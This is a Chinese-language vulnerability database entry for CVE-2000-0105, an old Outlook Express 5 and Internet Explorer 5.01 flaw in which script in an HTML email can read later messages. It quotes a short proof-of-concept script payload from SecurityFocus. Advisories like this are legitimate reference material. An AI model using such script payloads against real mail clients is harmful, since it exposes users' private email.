MS Outlook Express 5 Javascript电子邮件访问漏洞

MS Outlook Express 5 Javascript电子邮件访问漏洞

漏洞ID 1105697 漏洞类型 访问验证错误
发布时间 2000-02-01 更新时间 2005-10-20
图片[1]-MS Outlook Express 5 Javascript电子邮件访问漏洞-安全小百科CVE编号 CVE-2000-0105
图片[2]-MS Outlook Express 5 Javascript电子邮件访问漏洞-安全小百科CNNVD-ID CNNVD-200002-003
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19738
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-003
|漏洞详情
OutlookExpress5.01版本和InternetExplorer5.01版本存在漏洞。远程攻击者借助访问变量的脚本查看用户的电子邮件信息,此变量引用客户端已读取的后续的电子邮件消息。
|漏洞EXP
source: http://www.securityfocus.com/bid/962/info

Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run. 

Example code:
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
a.x=window.document;
</SCRIPT>
|参考资料

来源:BID
名称:962
链接:http://www.securityfocus.com/bid/962

相关推荐: PHP-Nuke Splatt Forum 4.0 Module – Cross-Site Scripting

PHP-Nuke Splatt Forum 4.0 Module – Cross-Site Scripting 漏洞ID 1053861 漏洞类型 发布时间 2003-05-01 更新时间 2003-05-01 CVE编号 N/A CNNVD-ID N/A 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享